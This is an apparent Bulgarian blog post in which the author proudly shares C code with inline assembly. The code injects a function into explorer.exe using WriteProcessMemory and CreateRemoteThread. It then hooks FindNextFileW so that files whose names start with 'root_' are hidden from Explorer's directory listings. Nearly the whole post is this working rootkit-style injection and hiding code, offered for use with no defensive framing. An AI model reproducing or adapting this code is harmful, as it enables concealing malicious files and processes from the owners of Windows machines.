Това е един от най яките ми кодове :) Кода инжектира функция в explorer.exe и тази функция прихваща FindNextFileW (който се използва от explorer.exe са обикновен листинг на директорийте) и така скрива всички файлове чийто имена започват с "root_" :)
#include
#include
#include
typedef int (WINAPI *VP) (LPVOID,SIZE_T,DWORD,PDWORD);
typedef struct {
VP SetVP;
DWORD *FindFileW;
} Inject_Data;
int Inject(Inject_Data *Data);
int main()
{
Inject_Data Data;
LPVOID Mem,Prm;
HANDLE rThread;
HANDLE handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 ProcessInfo;
ProcessInfo.dwSize = sizeof(PROCESSENTRY32);
Data.FindFileW = (DWORD *)GetProcAddress(GetModuleHandle("kernel32.dll"),"FindNextFileW");
Data.SetVP = (VP)GetProcAddress(GetModuleHandle("kernel32.dll"),"VirtualProtect");
while(Process32Next(handle, &ProcessInfo))
{
if(!strcmp(ProcessInfo.szExeFile, "explorer.exe"))
{
handle = OpenProcess(PROCESS_ALL_ACCESS,0,ProcessInfo.th32ProcessID);
Prm = VirtualAllocEx(handle,NULL,sizeof(Data),MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
WriteProcessMemory(handle,Prm,&Data,sizeof(Data),NULL);
Mem = VirtualAllocEx(handle,NULL,2000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
WriteProcessMemory(handle,Mem,Inject,2000,NULL);
rThread = CreateRemoteThread(handle,NULL,0,(LPTHREAD_START_ROUTINE)Mem,Prm,0,NULL);
WaitForSingleObject(rThread, INFINITE);
CloseHandle(handle);
}
}
return 0;
}
int Inject(Inject_Data *Data) {
DWORD i,tmptr;
i = (DWORD) Data->FindFileW;
Data->SetVP((LPVOID)i,5,PAGE_EXECUTE_READWRITE,(PDWORD)&tmptr);
__asm{
call GetDelta
GetDelta:
pop edi
sub edi,offset GetDelta
lea edx,[StolenBytes+edi]
mov i,edx
}
Data->SetVP((LPVOID)i,5,PAGE_EXECUTE_READWRITE,(PDWORD)&tmptr);
i = (DWORD) Data->FindFileW;
__asm{
call GetDelta1
GetDelta1:
pop edi
sub edi,offset GetDelta1
mov eax,i
mov ecx,5
lea edx,[StolenBytes+edi]
}
__asm{
myloop:
mov bl,byte ptr[eax]
mov byte ptr[edx],bl
inc eax
inc edx
loop myloop
sub eax,5
lea edx,[Hooked+edi]
mov byte ptr[eax],0xE8
sub edx,eax
sub edx,5
inc eax
mov dword ptr[eax],edx
}
return 0;
__asm{
Hooked:
pop eax /* poping the ret address to FindNextFileW */
movd mm0,eax /*saving it for later */
pop eax /* poping the ret address to the injected process */
movd mm1,eax /* saving it for laterz */
/* saving the registers and flags */
pop eax /* saving the arguments */
movd mm2,eax
pop eax
movd mm3,eax
pushad
pushfd
movd eax,mm3 /* recovering the arguments */
push eax
movd eax,mm2
push eax
call GetDelta2
GetDelta2:
pop edi
sub edi,offset GetDelta2
movd eax,mm0
sub eax,5
mov ecx,5
lea edx,[StolenBytes+edi]
myloop1: /* recoverying the stolen bytes */
mov bl,byte ptr[edx]
mov byte ptr[eax],bl
inc eax
inc edx
loop myloop1
HideFile:
pop ebx /* saving arguments for later */
pop eax
push eax
push ebx
push eax
push ebx
movd eax,mm0 /* recovering the FindNextFileW address */
sub eax,5 /* we go the beginning of the FindNextFileW function */
call eax /* calling FindNextFileW */
test eax,eax
movd mm2,eax /* saving it for reocvery (injected process may need it)*/
pop ebx /*poping the handle */
pop eax /*poping the find file structure */
jz RecoveryAndBack
mov edx,eax
add edx,0x2C /* go to found file name */
cmp byte ptr[edx],'r'
jnz RecoveryAndBack
inc edx
inc edx
cmp byte ptr[edx],'o'
jnz RecoveryAndBack
inc edx
inc edx
cmp byte ptr[edx],'o'
jnz RecoveryAndBack
inc edx
inc edx
cmp byte ptr[edx],'t'
jnz RecoveryAndBack
inc edx
inc edx
cmp byte ptr[edx],'_'
jnz RecoveryAndBack
push eax /* pushing the arguments for the next execution of FindNextFileW*/
push ebx
jmp HideFile
RecoveryAndBack:
movd eax,mm0
sub eax,5
mov byte ptr[eax],0xE8
lea edx,[Hooked+edi]
sub edx,eax
sub edx,5
inc eax
mov dword ptr[eax],edx
popfd
popad
movd eax,mm1
push eax
movd eax,mm2
ret
StolenBytes:
nop
nop
nop
nop
nop
nop
nop
nop
}
}
Няма коментари:
Публикуване на коментар